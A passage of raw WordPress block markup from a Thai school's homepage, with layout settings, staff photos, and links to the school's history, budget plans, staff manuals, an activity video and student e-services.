wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 